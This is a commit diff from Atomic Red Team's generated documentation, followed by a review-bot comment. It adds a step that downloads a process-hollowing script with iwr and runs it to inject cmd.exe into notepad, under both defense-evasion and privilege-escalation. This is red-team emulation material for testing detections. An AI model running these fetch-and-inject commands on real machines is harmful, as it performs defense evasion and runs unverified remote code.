Generated docs from job=generate-docs branch=master [ci skip]

Atomic Red Team doc generator
2025-07-17 22:30:09 +00:00
parent b0b572815d
commit 3aaf3364aa
3 changed files with 120 additions and 9 deletions
+50 -4
@@ -23819,6 +23819,14 @@ defense-evasion:
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside
the sponsor)
@@ -23838,7 +23846,7 @@ defense-evasion:
default: notepad
executor:
command: |
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -23846,6 +23854,21 @@ defense-evasion:
'
name: powershell
dependency_executor_name: powershell
dependencies:
- description: 'Start-Hollow.ps1 must be installed
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -23931,7 +23954,7 @@ defense-evasion:
-program "#{hollow_binary_path}" -debug
'
cleanup_command: |-
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1564.009:
@@ -46361,6 +46384,14 @@ privilege-escalation:
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside
the sponsor)
@@ -46380,7 +46411,7 @@ privilege-escalation:
default: notepad
executor:
command: |
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -46388,6 +46419,21 @@ privilege-escalation:
'
name: powershell
dependency_executor_name: powershell
dependencies:
- description: 'Start-Hollow.ps1 must be installed
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -46473,7 +46519,7 @@ privilege-escalation:
-program "#{hollow_binary_path}" -debug
'
cleanup_command: |-
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1068:
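Review bot: In the `get_prereq_command` added under `dependencies`, `New-Item -Path #{script_path} -Force` substitutes the path unquoted, whereas the `prereq_command` and the dot-source line in `command` both quote it, so a `script_path` containing a space would be split into separate arguments and the prerequisite fetch would fail or write to an unintended location. The line should read `iwr "#{script_download_url}" -OutFile (New-Item -Path "#{script_path}" -Force)`. The downloaded file is then dot-sourced by the executor; the default URL is pinned to a commit, but `script_download_url` can be overridden and nothing verifies the content, so a `Get-FileHash` comparison against an expected digest before use would be a worthwhile addition. The same lines recur in the privilege-escalation hunk of this file and in the other two file sections, and since these files are generated the change belongs in the source atomic definition rather than here.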
+50 -4
@@ -19697,6 +19697,14 @@ defense-evasion:
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside
the sponsor)
@@ -19716,7 +19724,7 @@ defense-evasion:
default: notepad
executor:
command: |
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -19724,6 +19732,21 @@ defense-evasion:
'
name: powershell
dependency_executor_name: powershell
dependencies:
- description: 'Start-Hollow.ps1 must be installed
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -19809,7 +19832,7 @@ defense-evasion:
-program "#{hollow_binary_path}" -debug
'
cleanup_command: |-
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1564.009:
@@ -38413,6 +38436,14 @@ privilege-escalation:
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside
the sponsor)
@@ -38432,7 +38463,7 @@ privilege-escalation:
default: notepad
executor:
command: |
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -38440,6 +38471,21 @@ privilege-escalation:
'
name: powershell
dependency_executor_name: powershell
dependencies:
- description: 'Start-Hollow.ps1 must be installed
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -38525,7 +38571,7 @@ privilege-escalation:
-program "#{hollow_binary_path}" -debug
'
cleanup_command: |-
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1068:
+20 -1
@@ -39,6 +39,8 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_download_url | Download url for Start-Hollow.ps1 | string | https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1|
| script_path | Path to Start-Hollow.ps1 | path | PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1|
| hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe|
| parent_process_name | Name of the parent process | string | explorer|
| sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | string | C:\Windows\System32\notepad.exe|
@@ -49,7 +51,7 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
```powershell
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
```
@@ -61,6 +63,23 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
#### Dependencies: Run with `powershell`!
##### Description: Start-Hollow.ps1 must be installed
##### Check Prereq Commands:
```powershell
if (Test-Path "#{script_path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
```
<br/>